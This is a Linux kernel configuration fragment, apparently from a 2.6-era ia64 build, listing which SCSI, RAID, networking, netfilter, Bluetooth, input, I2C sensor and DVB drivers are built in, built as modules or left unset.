CONFIG_AIC79XX_DEBUG_MASK=0 # CONFIG_AIC79XX_REG_PRETTY_PRINT is not set CONFIG_SCSI_MEGARAID=m CONFIG_SCSI_SATA=y # CONFIG_SCSI_SATA_SVW is not set CONFIG_SCSI_ATA_PIIX=m CONFIG_SCSI_SATA_NV=m CONFIG_SCSI_SATA_PROMISE=m CONFIG_SCSI_SATA_SX4=m CONFIG_SCSI_SATA_SIL=m CONFIG_SCSI_SATA_SIS=m CONFIG_SCSI_SATA_VIA=m CONFIG_SCSI_SATA_VITESSE=m # CONFIG_SCSI_BUSLOGIC is not set CONFIG_SCSI_DMX3191D=m # CONFIG_SCSI_EATA is not set CONFIG_SCSI_EATA_PIO=m CONFIG_SCSI_FUTURE_DOMAIN=m CONFIG_SCSI_GDTH=m CONFIG_SCSI_IPS=m CONFIG_SCSI_INIA100=m CONFIG_SCSI_PPA=m CONFIG_SCSI_IMM=m # CONFIG_SCSI_IZIP_EPP16 is not set # CONFIG_SCSI_IZIP_SLOW_CTR is not set CONFIG_SCSI_SYM53C8XX_2=m CONFIG_SCSI_SYM53C8XX_DMA_ADDRESSING_MODE=0 CONFIG_SCSI_SYM53C8XX_DEFAULT_TAGS=16 CONFIG_SCSI_SYM53C8XX_MAX_TAGS=64 # CONFIG_SCSI_SYM53C8XX_IOMAPPED is not set CONFIG_SCSI_IPR=m # CONFIG_SCSI_IPR_TRACE is not set # CONFIG_SCSI_IPR_DUMP is not set CONFIG_SCSI_QLOGIC_ISP=m CONFIG_SCSI_QLOGIC_FC=m CONFIG_SCSI_QLOGIC_FC_FIRMWARE=y CONFIG_SCSI_QLOGIC_1280=m CONFIG_SCSI_QLOGIC_1280_1040=y CONFIG_SCSI_DC395x=m CONFIG_SCSI_DC390T=m # CONFIG_SCSI_DEBUG is not set # # PCMCIA SCSI adapter support # CONFIG_PCMCIA_FDOMAIN=m CONFIG_PCMCIA_QLOGIC=m CONFIG_PCMCIA_SYM53C500=m # # Multi-device support (RAID and LVM) # CONFIG_MD=y CONFIG_BLK_DEV_MD=m CONFIG_MD_LINEAR=m CONFIG_MD_RAID0=m CONFIG_MD_RAID1=m CONFIG_MD_RAID5=m CONFIG_MD_RAID6=m CONFIG_MD_MULTIPATH=m CONFIG_BLK_DEV_DM=m CONFIG_DM_CRYPT=m CONFIG_DM_SNAPSHOT=m CONFIG_DM_MIRROR=m CONFIG_DM_ZERO=m # # Fusion MPT device support # CONFIG_FUSION=m CONFIG_FUSION_MAX_SGE=40 CONFIG_FUSION_ISENSE=m CONFIG_FUSION_CTL=m CONFIG_FUSION_LAN=m # # IEEE 1394 (FireWire) support # CONFIG_IEEE1394=m # # Subsystem Options # # CONFIG_IEEE1394_VERBOSEDEBUG is not set CONFIG_IEEE1394_OUI_DB=y CONFIG_IEEE1394_EXTRA_CONFIG_ROMS=y CONFIG_IEEE1394_CONFIG_ROM_IP1394=y # # Device Drivers # CONFIG_IEEE1394_PCILYNX=m CONFIG_IEEE1394_OHCI1394=m # # Protocol Drivers # CONFIG_IEEE1394_VIDEO1394=m CONFIG_IEEE1394_SBP2=m # CONFIG_IEEE1394_SBP2_PHYS_DMA is not set CONFIG_IEEE1394_ETH1394=m CONFIG_IEEE1394_DV1394=m CONFIG_IEEE1394_RAWIO=m CONFIG_IEEE1394_CMP=m CONFIG_IEEE1394_AMDTP=m # # I2O device support # CONFIG_I2O=m CONFIG_I2O_CONFIG=m CONFIG_I2O_BLOCK=m CONFIG_I2O_SCSI=m CONFIG_I2O_PROC=m # # IP: Virtual Server Configuration # CONFIG_IP_VS=m # CONFIG_IP_VS_DEBUG is not set CONFIG_IP_VS_TAB_BITS=12 # # IPVS transport protocol load balancing support # CONFIG_IP_VS_PROTO_TCP=y CONFIG_IP_VS_PROTO_UDP=y CONFIG_IP_VS_PROTO_ESP=y CONFIG_IP_VS_PROTO_AH=y # # IPVS scheduler # CONFIG_IP_VS_RR=m CONFIG_IP_VS_WRR=m CONFIG_IP_VS_LC=m CONFIG_IP_VS_WLC=m CONFIG_IP_VS_LBLC=m CONFIG_IP_VS_LBLCR=m CONFIG_IP_VS_DH=m CONFIG_IP_VS_SH=m CONFIG_IP_VS_SED=m CONFIG_IP_VS_NQ=m # # IPVS application helper # CONFIG_IP_VS_FTP=m CONFIG_IPV6=m # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y # CONFIG_PACKET_MMAP is not set CONFIG_NETLINK_DEV=m CONFIG_UNIX=y CONFIG_NET_KEY=m CONFIG_INET=y CONFIG_IP_MULTICAST=y CONFIG_IP_ADVANCED_ROUTER=y CONFIG_IP_MULTIPLE_TABLES=y CONFIG_IP_ROUTE_FWMARK=y CONFIG_IP_ROUTE_NAT=y CONFIG_IP_ROUTE_MULTIPATH=y CONFIG_IP_ROUTE_TOS=y CONFIG_IP_ROUTE_VERBOSE=y # CONFIG_IP_PNP is not set CONFIG_NET_IPIP=m # CONFIG_NET_IPGRE is not set # CONFIG_IP_MROUTE is not set # CONFIG_ARPD is not set CONFIG_SYN_COOKIES=y # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set CONFIG_INET_IPCOMP=m # # IP: Virtual Server Configuration # CONFIG_IP_VS=m # CONFIG_IP_VS_DEBUG is not set CONFIG_IP_VS_TAB_BITS=12 # # IPVS transport protocol load balancing support # CONFIG_IP_VS_PROTO_TCP=y CONFIG_IP_VS_PROTO_UDP=y CONFIG_IP_VS_PROTO_ESP=y CONFIG_IP_VS_PROTO_AH=y # # IPVS scheduler # CONFIG_IP_VS_RR=m CONFIG_IP_VS_WRR=m CONFIG_IP_VS_LC=m CONFIG_IP_VS_WLC=m CONFIG_IP_VS_LBLC=m CONFIG_IP_VS_LBLCR=m CONFIG_IP_VS_DH=m CONFIG_IP_VS_SH=m CONFIG_IP_VS_SED=m CONFIG_IP_VS_NQ=m # # IPVS application helper # CONFIG_IP_VS_FTP=m CONFIG_IPV6=m # CONFIG_IPV6_PRIVACY is not set # CONFIG_INET6_AH is not set # CONFIG_INET6_ESP is not set CONFIG_INET6_IPCOMP=m CONFIG_IPV6_TUNNEL=m CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set CONFIG_BRIDGE_NETFILTER=y # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=m CONFIG_IP_NF_FTP=m CONFIG_IP_NF_IRC=m CONFIG_IP_NF_TFTP=m CONFIG_IP_NF_AMANDA=m CONFIG_IP_NF_QUEUE=m CONFIG_IP_NF_IPTABLES=m CONFIG_IP_NF_MATCH_LIMIT=m CONFIG_IP_NF_MATCH_IPRANGE=m CONFIG_IP_NF_MATCH_MAC=m CONFIG_IP_NF_MATCH_PKTTYPE=m CONFIG_IP_NF_MATCH_MARK=m CONFIG_IP_NF_MATCH_MULTIPORT=m CONFIG_IP_NF_MATCH_TOS=m CONFIG_IP_NF_MATCH_RECENT=m CONFIG_IP_NF_MATCH_ECN=m CONFIG_IP_NF_MATCH_DSCP=m CONFIG_IP_NF_MATCH_AH_ESP=m CONFIG_IP_NF_MATCH_LENGTH=m CONFIG_IP_NF_MATCH_TTL=m CONFIG_IP_NF_MATCH_TCPMSS=m CONFIG_IP_NF_MATCH_HELPER=m CONFIG_IP_NF_MATCH_STATE=m CONFIG_IP_NF_MATCH_CONNTRACK=m CONFIG_IP_NF_MATCH_OWNER=m CONFIG_IP_NF_MATCH_PHYSDEV=m CONFIG_IP_NF_FILTER=m CONFIG_IP_NF_TARGET_REJECT=m CONFIG_IP_NF_NAT=m CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=m CONFIG_IP_NF_TARGET_REDIRECT=m CONFIG_IP_NF_TARGET_NETMAP=m CONFIG_IP_NF_TARGET_SAME=m CONFIG_IP_NF_NAT_LOCAL=y CONFIG_IP_NF_NAT_SNMP_BASIC=m CONFIG_IP_NF_NAT_IRC=m CONFIG_IP_NF_NAT_FTP=m CONFIG_IP_NF_NAT_TFTP=m CONFIG_IP_NF_NAT_AMANDA=m CONFIG_IP_NF_MANGLE=m CONFIG_IP_NF_TARGET_TOS=m CONFIG_IP_NF_TARGET_ECN=m CONFIG_IP_NF_TARGET_DSCP=m CONFIG_IP_NF_TARGET_MARK=m CONFIG_IP_NF_TARGET_CLASSIFY=m CONFIG_IP_NF_TARGET_LOG=m CONFIG_IP_NF_TARGET_ULOG=m CONFIG_IP_NF_TARGET_TCPMSS=m CONFIG_IP_NF_ARPTABLES=m CONFIG_IP_NF_ARPFILTER=m CONFIG_IP_NF_ARP_MANGLE=m CONFIG_IP_NF_COMPAT_IPCHAINS=m CONFIG_IP_NF_COMPAT_IPFWADM=m CONFIG_IP_NF_TARGET_NOTRACK=m CONFIG_IP_NF_RAW=m CONFIG_IP_NF_MATCH_ADDRTYPE=m CONFIG_IP_NF_MATCH_REALM=m # # IPv6: Netfilter Configuration # # CONFIG_IP6_NF_QUEUE is not set CONFIG_IP6_NF_IPTABLES=m CONFIG_IP6_NF_MATCH_LIMIT=m CONFIG_IP6_NF_MATCH_MAC=m CONFIG_IP6_NF_MATCH_RT=m CONFIG_IP6_NF_MATCH_OPTS=m CONFIG_IP6_NF_MATCH_FRAG=m CONFIG_IP6_NF_MATCH_HL=m CONFIG_IP6_NF_MATCH_MULTIPORT=m CONFIG_IP6_NF_MATCH_OWNER=m CONFIG_IP6_NF_MATCH_MARK=m CONFIG_IP6_NF_MATCH_IPV6HEADER=m CONFIG_IP6_NF_MATCH_AHESP=m CONFIG_IP6_NF_MATCH_LENGTH=m CONFIG_IP6_NF_MATCH_EUI64=m CONFIG_IP6_NF_FILTER=m CONFIG_IP6_NF_TARGET_LOG=m CONFIG_IP6_NF_MANGLE=m CONFIG_IP6_NF_TARGET_MARK=m CONFIG_IP6_NF_RAW=m # # DECnet: Netfilter Configuration # CONFIG_DECNET_NF_GRABULATOR=m # # Bridge: Netfilter Configuration # CONFIG_BRIDGE_NF_EBTABLES=m CONFIG_BRIDGE_EBT_BROUTE=m CONFIG_BRIDGE_EBT_T_FILTER=m CONFIG_BRIDGE_EBT_T_NAT=m CONFIG_BRIDGE_EBT_802_3=m CONFIG_BRIDGE_EBT_AMONG=m CONFIG_BRIDGE_EBT_ARP=m CONFIG_BRIDGE_EBT_IP=m CONFIG_BRIDGE_EBT_LIMIT=m CONFIG_BRIDGE_EBT_MARK=m CONFIG_BRIDGE_EBT_PKTTYPE=m CONFIG_BRIDGE_EBT_STP=m CONFIG_BRIDGE_EBT_VLAN=m CONFIG_BRIDGE_EBT_ARPREPLY=m CONFIG_BRIDGE_EBT_DNAT=m CONFIG_BRIDGE_EBT_MARK_T=m CONFIG_BRIDGE_EBT_REDIRECT=m CONFIG_BRIDGE_EBT_SNAT=m CONFIG_BRIDGE_EBT_LOG=m CONFIG_XFRM=y CONFIG_XFRM_USER=m # # SCTP Configuration (EXPERIMENTAL) # CONFIG_IP_SCTP=m # CONFIG_SCTP_DBG_MSG is not set # CONFIG_SCTP_DBG_OBJCNT is not set CONFIG_SCTP_HMAC_NONE=y # CONFIG_SCTP_HMAC_SHA1 is not set # CONFIG_SCTP_HMAC_MD5 is not set # CONFIG_ATM is not set CONFIG_BRIDGE=m CONFIG_VLAN_8021Q=m CONFIG_DECNET=m # CONFIG_DECNET_SIOCGIFCONF is not set # CONFIG_DECNET_ROUTER is not set CONFIG_LLC=y CONFIG_LLC2=m CONFIG_IPX=m # CONFIG_IPX_INTERN is not set CONFIG_ATALK=m CONFIG_DEV_APPLETALK=y CONFIG_IPDDP=m CONFIG_IPDDP_ENCAP=y CONFIG_IPDDP_DECAP=y # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set CONFIG_WAN_ROUTER=m # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # CONFIG_NET_SCHED=y CONFIG_NET_SCH_CLK_JIFFIES=y # CONFIG_NET_SCH_CLK_GETTIMEOFDAY is not set # CONFIG_NET_SCH_CLK_CPU is not set CONFIG_NET_SCH_CBQ=m CONFIG_NET_SCH_HTB=m CONFIG_NET_SCH_HFSC=m CONFIG_NET_SCH_PRIO=m CONFIG_NET_SCH_RED=m CONFIG_NET_SCH_SFQ=m CONFIG_NET_SCH_TEQL=m CONFIG_NET_SCH_TBF=m CONFIG_NET_SCH_GRED=m CONFIG_NET_SCH_DSMARK=m CONFIG_NET_SCH_NETEM=m CONFIG_NET_SCH_INGRESS=m CONFIG_NET_QOS=y CONFIG_NET_ESTIMATOR=y CONFIG_NET_CLS=y CONFIG_NET_CLS_TCINDEX=m CONFIG_NET_CLS_ROUTE4=m CONFIG_NET_CLS_ROUTE=y CONFIG_NET_CLS_FW=m CONFIG_NET_CLS_U32=m # CONFIG_CLS_U32_PERF is not set # CONFIG_NET_CLS_IND is not set CONFIG_NET_CLS_RSVP=m CONFIG_NET_CLS_RSVP6=m # CONFIG_NET_CLS_ACT is not set CONFIG_NET_CLS_POLICE=y # # Network testing # CONFIG_NET_PKTGEN=m CONFIG_NETPOLL=y CONFIG_NETPOLL_RX=y CONFIG_NETPOLL_TRAP=y CONFIG_NET_POLL_CONTROLLER=y CONFIG_HAMRADIO=y # # Packet Radio protocols # CONFIG_AX25=m CONFIG_AX25_DAMA_SLAVE=y CONFIG_NETROM=m CONFIG_ROSE=m # # AX.25 network device drivers # CONFIG_BPQETHER=m CONFIG_BAYCOM_SER_FDX=m CONFIG_BAYCOM_SER_HDX=m CONFIG_BAYCOM_PAR=m CONFIG_YAM=m CONFIG_IRDA=m # # IrDA protocols # CONFIG_IRLAN=m CONFIG_IRNET=m CONFIG_IRCOMM=m # CONFIG_IRDA_ULTRA is not set # # IrDA options # # CONFIG_IRDA_CACHE_LAST_LSAP is not set # CONFIG_IRDA_FAST_RR is not set # CONFIG_IRDA_DEBUG is not set # # Infrared-port device drivers # # # SIR device drivers # CONFIG_IRTTY_SIR=m # # Dongle support # # CONFIG_DONGLE is not set # # Old SIR device drivers # # # Old Serial dongle support # # # FIR device drivers # CONFIG_USB_IRDA=m CONFIG_SIGMATEL_FIR=m # CONFIG_VLSI_FIR is not set CONFIG_BT=m CONFIG_BT_L2CAP=m CONFIG_BT_SCO=m CONFIG_BT_RFCOMM=m # CONFIG_BT_RFCOMM_TTY is not set CONFIG_BT_BNEP=m # CONFIG_BT_BNEP_MC_FILTER is not set # CONFIG_BT_BNEP_PROTO_FILTER is not set CONFIG_BT_HIDP=m # # Bluetooth device drivers # CONFIG_BT_HCIUSB=m # CONFIG_BT_HCIUSB_SCO is not set CONFIG_BT_HCIUART=m # CONFIG_BT_HCIUART_H4 is not set # CONFIG_BT_HCIUART_BCSP is not set CONFIG_BT_HCIBCM203X=m CONFIG_BT_HCIBFUSB=m # CONFIG_BT_HCIDTL1 is not set # CONFIG_BT_HCIBT3C is not set # CONFIG_BT_HCIBLUECARD is not set # CONFIG_BT_HCIBTUART is not set CONFIG_BT_HCIVHCI=m CONFIG_NETDEVICES=y CONFIG_DUMMY=m CONFIG_BONDING=m CONFIG_EQUALIZER=m CONFIG_TUN=m CONFIG_ETHERTAP=m # # ARCnet devices # CONFIG_ARCNET=m CONFIG_ARCNET_1201=m CONFIG_ARCNET_1051=m CONFIG_ARCNET_RAW=m CONFIG_ARCNET_COM90xx=m CONFIG_ARCNET_COM90xxIO=m CONFIG_ARCNET_RIM_I=m CONFIG_ARCNET_COM20020=m CONFIG_ARCNET_COM20020_PCI=m # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y CONFIG_MII=m # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set CONFIG_NET_VENDOR_3COM=y CONFIG_VORTEX=m CONFIG_TYPHOON=m # # Tulip family network device support # CONFIG_NET_TULIP=y CONFIG_DE2104X=m CONFIG_TULIP=m # CONFIG_TULIP_MWI is not set # CONFIG_TULIP_MMIO is not set # CONFIG_TULIP_NAPI is not set CONFIG_DE4X5=m CONFIG_WINBOND_840=m CONFIG_DM9102=m # CONFIG_PCMCIA_XIRCOM is not set CONFIG_HP100=m CONFIG_NET_PCI=y CONFIG_PCNET32=m CONFIG_AMD8111_ETH=m # CONFIG_AMD8111E_NAPI is not set CONFIG_ADAPTEC_STARFIRE=m # CONFIG_ADAPTEC_STARFIRE_NAPI is not set CONFIG_B44=m CONFIG_FORCEDETH=m CONFIG_EEPRO100=m # CONFIG_EEPRO100_PIO is not set CONFIG_E100=m # CONFIG_E100_NAPI is not set CONFIG_FEALNX=m CONFIG_NATSEMI=m CONFIG_NE2K_PCI=m CONFIG_8139CP=m CONFIG_8139TOO=m # CONFIG_8139TOO_PIO is not set # CONFIG_8139TOO_TUNE_TWISTER is not set # CONFIG_8139TOO_8129 is not set # CONFIG_8139_OLD_RX_RESET is not set CONFIG_SIS900=m CONFIG_EPIC100=m CONFIG_SUNDANCE=m # CONFIG_SUNDANCE_MMIO is not set CONFIG_VIA_RHINE=m # CONFIG_VIA_RHINE_MMIO is not set CONFIG_VIA_VELOCITY=m # # Ethernet (1000 Mbit) # CONFIG_DL2K=m CONFIG_E1000=m CONFIG_E1000_NAPI=y CONFIG_NS83820=m CONFIG_HAMACHI=m CONFIG_YELLOWFIN=m CONFIG_R8169=m CONFIG_SK98LIN=m CONFIG_TIGON3=m # # Ethernet (10000 Mbit) # CONFIG_IXGB=m # CONFIG_IXGB_NAPI is not set CONFIG_S2IO=m # CONFIG_S2IO_NAPI is not set # # Token Ring devices # CONFIG_TR=y CONFIG_IBMOL=m CONFIG_3C359=m # CONFIG_TMS380TR is not set # # Wireless LAN (non-hamradio) # CONFIG_NET_RADIO=y # # Obsolete Wireless cards support (pre-802.11) # CONFIG_STRIP=m # CONFIG_PCMCIA_WAVELAN is not set # CONFIG_PCMCIA_NETWAVE is not set # # Wireless 802.11 Frequency Hopping cards support # # CONFIG_PCMCIA_RAYCS is not set # # Wireless 802.11b ISA/PCI cards support # CONFIG_HERMES=m CONFIG_PLX_HERMES=m CONFIG_TMD_HERMES=m CONFIG_PCI_HERMES=m CONFIG_ATMEL=m CONFIG_PCI_ATMEL=m # # Wireless 802.11b Pcmcia/Cardbus cards support # # CONFIG_PCMCIA_HERMES is not set # CONFIG_AIRO_CS is not set CONFIG_PCMCIA_ATMEL=m # CONFIG_PCMCIA_WL3501 is not set # # Prism GT/Duette 802.11(a/b/g) PCI/Cardbus support # CONFIG_PRISM54=m CONFIG_NET_WIRELESS=y # # PCMCIA network device support # # CONFIG_NET_PCMCIA is not set # # Wan interfaces # CONFIG_WAN=y CONFIG_DSCC4=m # CONFIG_DSCC4_PCISYNC is not set # CONFIG_DSCC4_PCI_RST is not set CONFIG_LANMEDIA=m CONFIG_SYNCLINK_SYNCPPP=m CONFIG_HDLC=m CONFIG_HDLC_RAW=y CONFIG_HDLC_RAW_ETH=y CONFIG_HDLC_CISCO=y CONFIG_HDLC_FR=y CONFIG_HDLC_PPP=y # # X.25/LAPB support is disabled # CONFIG_PCI200SYN=m CONFIG_WANXL=m CONFIG_PC300=m CONFIG_PC300_MLPPP=y CONFIG_FARSYNC=m CONFIG_DLCI=m CONFIG_DLCI_COUNT=24 CONFIG_DLCI_MAX=8 CONFIG_WAN_ROUTER_DRIVERS=y # CONFIG_CYCLADES_SYNC is not set CONFIG_FDDI=y CONFIG_DEFXX=m CONFIG_SKFP=m # CONFIG_HIPPI is not set CONFIG_PLIP=m CONFIG_PPP=m CONFIG_PPP_MULTILINK=y CONFIG_PPP_FILTER=y CONFIG_PPP_ASYNC=m CONFIG_PPP_SYNC_TTY=m CONFIG_PPP_DEFLATE=m CONFIG_PPP_BSDCOMP=m CONFIG_PPPOE=m CONFIG_SLIP=m CONFIG_SLIP_COMPRESSED=y CONFIG_SLIP_SMART=y CONFIG_SLIP_MODE_SLIP6=y CONFIG_NET_FC=y CONFIG_SHAPER=m CONFIG_NETCONSOLE=m # # ISDN subsystem # # CONFIG_ISDN is not set # # Telephony Support # CONFIG_PHONE=m CONFIG_PHONE_IXJ=m CONFIG_PHONE_IXJ_PCMCIA=m # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 CONFIG_INPUT_MOUSEDEV_PSAUX_ENABLE=y CONFIG_INPUT_JOYDEV=m CONFIG_INPUT_TSDEV=m CONFIG_INPUT_TSDEV_SCREEN_X=240 CONFIG_INPUT_TSDEV_SCREEN_Y=320 CONFIG_INPUT_EVDEV=m CONFIG_INPUT_EVBUG=m # # Input I/O drivers # CONFIG_GAMEPORT=m CONFIG_SOUND_GAMEPORT=m CONFIG_GAMEPORT_NS558=m CONFIG_GAMEPORT_L4=m CONFIG_GAMEPORT_EMU10K1=m CONFIG_GAMEPORT_VORTEX=m CONFIG_GAMEPORT_FM801=m CONFIG_GAMEPORT_CS461x=m CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_SERPORT=m CONFIG_SERIO_CT82C710=m CONFIG_SERIO_PARKBD=m CONFIG_SERIO_PCIPS2=m # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y CONFIG_KEYBOARD_SUNKBD=m CONFIG_KEYBOARD_LKKBD=m CONFIG_KEYBOARD_XTKBD=m CONFIG_KEYBOARD_NEWTON=m CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=m CONFIG_MOUSE_SERIAL=m CONFIG_MOUSE_VSXXXAA=m CONFIG_INPUT_JOYSTICK=y CONFIG_JOYSTICK_ANALOG=m CONFIG_JOYSTICK_A3D=m CONFIG_JOYSTICK_ADI=m CONFIG_JOYSTICK_COBRA=m CONFIG_JOYSTICK_GF2K=m CONFIG_JOYSTICK_GRIP=m CONFIG_JOYSTICK_GRIP_MP=m CONFIG_JOYSTICK_GUILLEMOT=m CONFIG_JOYSTICK_INTERACT=m CONFIG_JOYSTICK_SIDEWINDER=m CONFIG_JOYSTICK_TMDC=m CONFIG_JOYSTICK_IFORCE=m # CONFIG_JOYSTICK_IFORCE_USB is not set # CONFIG_JOYSTICK_IFORCE_232 is not set CONFIG_JOYSTICK_WARRIOR=m CONFIG_JOYSTICK_MAGELLAN=m CONFIG_JOYSTICK_SPACEORB=m CONFIG_JOYSTICK_SPACEBALL=m CONFIG_JOYSTICK_STINGER=m CONFIG_JOYSTICK_TWIDDLER=m CONFIG_JOYSTICK_DB9=m CONFIG_JOYSTICK_GAMECON=m CONFIG_JOYSTICK_TURBOGRAFX=m CONFIG_INPUT_JOYDUMP=m # CONFIG_INPUT_TOUCHSCREEN is not set CONFIG_INPUT_MISC=y CONFIG_INPUT_UINPUT=m # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y CONFIG_SERIAL_NONSTANDARD=y CONFIG_ROCKETPORT=m # CONFIG_CYCLADES is not set # CONFIG_SYNCLINK is not set CONFIG_SYNCLINKMP=m CONFIG_N_HDLC=m CONFIG_STALDRV=y # # Serial drivers # CONFIG_SERIAL_8250=y CONFIG_SERIAL_8250_CONSOLE=y CONFIG_SERIAL_8250_CS=m CONFIG_SERIAL_8250_ACPI=y CONFIG_SERIAL_8250_NR_UARTS=4 CONFIG_SERIAL_8250_EXTENDED=y CONFIG_SERIAL_8250_SHARE_IRQ=y # CONFIG_SERIAL_8250_DETECT_IRQ is not set CONFIG_SERIAL_8250_MULTIPORT=y CONFIG_SERIAL_8250_RSA=y # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y CONFIG_SERIAL_CORE_CONSOLE=y CONFIG_SERIAL_SGI_L1_CONSOLE=y CONFIG_UNIX98_PTYS=y CONFIG_LEGACY_PTYS=y CONFIG_LEGACY_PTY_COUNT=256 CONFIG_PRINTER=m # CONFIG_LP_CONSOLE is not set CONFIG_PPDEV=m CONFIG_TIPAR=m # CONFIG_QIC02_TAPE is not set # # IPMI # CONFIG_IPMI_HANDLER=m # CONFIG_IPMI_PANIC_EVENT is not set CONFIG_IPMI_DEVICE_INTERFACE=m CONFIG_IPMI_SI=m CONFIG_IPMI_WATCHDOG=m # # Watchdog Cards # # CONFIG_WATCHDOG is not set # CONFIG_HW_RANDOM is not set CONFIG_EFI_RTC=y CONFIG_DTLK=m CONFIG_R3964=m CONFIG_APPLICOM=m # # Ftape, the floppy tape device driver # CONFIG_AGP=m CONFIG_AGP_I460=m CONFIG_AGP_HP_ZX1=m CONFIG_DRM=y CONFIG_DRM_TDFX=m CONFIG_DRM_GAMMA=m CONFIG_DRM_R128=m CONFIG_DRM_RADEON=m CONFIG_DRM_MGA=m CONFIG_DRM_SIS=m # # PCMCIA character devices # # CONFIG_SYNCLINK_CS is not set CONFIG_RAW_DRIVER=m # CONFIG_HPET is not set CONFIG_MAX_RAW_DEVS=256 # # I2C support # CONFIG_I2C=m CONFIG_I2C_CHARDEV=m # # I2C Algorithms # CONFIG_I2C_ALGOBIT=m CONFIG_I2C_ALGOPCF=m # # I2C Hardware Bus support # CONFIG_I2C_ALI1535=m CONFIG_I2C_ALI1563=m CONFIG_I2C_ALI15X3=m CONFIG_I2C_AMD756=m CONFIG_I2C_AMD8111=m CONFIG_I2C_I801=m CONFIG_I2C_I810=m CONFIG_I2C_ISA=m CONFIG_I2C_NFORCE2=m CONFIG_I2C_PARPORT=m CONFIG_I2C_PARPORT_LIGHT=m CONFIG_I2C_PROSAVAGE=m CONFIG_I2C_SAVAGE4=m CONFIG_SCx200_ACB=m CONFIG_I2C_SIS5595=m CONFIG_I2C_SIS630=m CONFIG_I2C_SIS96X=m CONFIG_I2C_VIA=m CONFIG_I2C_VIAPRO=m CONFIG_I2C_VOODOO3=m # # Hardware Sensors Chip support # CONFIG_I2C_SENSOR=m CONFIG_SENSORS_ADM1021=m CONFIG_SENSORS_ADM1025=m CONFIG_SENSORS_ADM1031=m CONFIG_SENSORS_ASB100=m CONFIG_SENSORS_DS1621=m CONFIG_SENSORS_FSCHER=m CONFIG_SENSORS_GL518SM=m CONFIG_SENSORS_IT87=m CONFIG_SENSORS_LM75=m CONFIG_SENSORS_LM77=m CONFIG_SENSORS_LM78=m CONFIG_SENSORS_LM80=m CONFIG_SENSORS_LM83=m CONFIG_SENSORS_LM85=m CONFIG_SENSORS_LM90=m CONFIG_SENSORS_MAX1619=m CONFIG_SENSORS_VIA686A=m CONFIG_SENSORS_W83781D=m CONFIG_SENSORS_W83L785TS=m CONFIG_SENSORS_W83627HF=m # # Other I2C Chip support # CONFIG_SENSORS_EEPROM=m CONFIG_SENSORS_PCF8574=m CONFIG_SENSORS_PCF8591=m CONFIG_SENSORS_RTC8564=m # CONFIG_I2C_DEBUG_CORE is not set # CONFIG_I2C_DEBUG_ALGO is not set # CONFIG_I2C_DEBUG_BUS is not set # CONFIG_I2C_DEBUG_CHIP is not set # # Dallas's 1-wire bus # CONFIG_W1=m CONFIG_W1_MATROX=m CONFIG_W1_THERM=m # # Misc devices # # # Multimedia devices # CONFIG_VIDEO_DEV=m # # Video For Linux # # # Video Adapters # CONFIG_VIDEO_BT848=m CONFIG_VIDEO_BWQCAM=m CONFIG_VIDEO_CQCAM=m CONFIG_VIDEO_W9966=m CONFIG_VIDEO_CPIA=m CONFIG_VIDEO_CPIA_PP=m CONFIG_VIDEO_CPIA_USB=m CONFIG_VIDEO_SAA5246A=m CONFIG_VIDEO_SAA5249=m CONFIG_TUNER_3036=m CONFIG_VIDEO_STRADIS=m CONFIG_VIDEO_ZORAN=m CONFIG_VIDEO_ZORAN_BUZ=m CONFIG_VIDEO_ZORAN_DC10=m CONFIG_VIDEO_ZORAN_DC30=m CONFIG_VIDEO_ZORAN_LML33=m CONFIG_VIDEO_ZORAN_LML33R10=m CONFIG_VIDEO_SAA7134=m CONFIG_VIDEO_MXB=m CONFIG_VIDEO_DPC=m CONFIG_VIDEO_HEXIUM_ORION=m CONFIG_VIDEO_HEXIUM_GEMINI=m CONFIG_VIDEO_CX88=m CONFIG_VIDEO_OVCAMCHIP=m # # Radio Adapters # CONFIG_RADIO_GEMTEK_PCI=m CONFIG_RADIO_MAXIRADIO=m CONFIG_RADIO_MAESTRO=m # # Digital Video Broadcasting Devices # CONFIG_DVB=y CONFIG_DVB_CORE=m # # Supported Frontend Modules # CONFIG_DVB_TWINHAN_DST=m CONFIG_DVB_STV0299=m CONFIG_DVB_SP887X=m CONFIG_DVB_SP887X_FIRMWARE_FILE="/usr/lib/hotplug/firmware/sc_main.mc" CONFIG_DVB_ALPS_TDLB7=m CONFIG_DVB_ALPS_TDMB7=m CONFIG_DVB_ATMEL_AT76C651=m CONFIG_DVB_CX24110=m CONFIG_DVB_GRUNDIG_29504_491=m CONFIG_DVB_GRUNDIG_29504_401=m CONFIG_DVB_MT312=m CONFIG_DVB_VES1820=m CONFIG_DVB_VES1X93=m CONFIG_DVB_TDA1004X=m CONFIG_DVB_TDA1004X_FIRMWARE_FILE="/usr/lib/hotplug/firmware/tda1004x.bin" CONFIG_DVB_NXT6000=m # # Supported SAA7146 based PCI Adapters # CONFIG_DVB_AV7110=m # CONFIG_DVB_AV7110_OSD is not set CONFIG_DVB_BUDGET=m CONFIG_DVB_BUDGET_CI=m CONFIG_DVB_BUDGET_AV=m CONFIG_DVB_BUDGET_PATCH=m # # Supported USB Adapters # CONFIG_DVB_TTUSB_BUDGET=m CONFIG_DVB_TTUSB_DEC=m # # Supported FlexCopII (B2C2) Adapters # CONFIG_DVB_B2C2_SKYSTAR=m # # Supported BT878 Adapters # CONFIG_DVB_BT8XX=m CONFIG_VIDEO_SAA7146=m CONFIG_VIDEO_SAA7146_VV=m 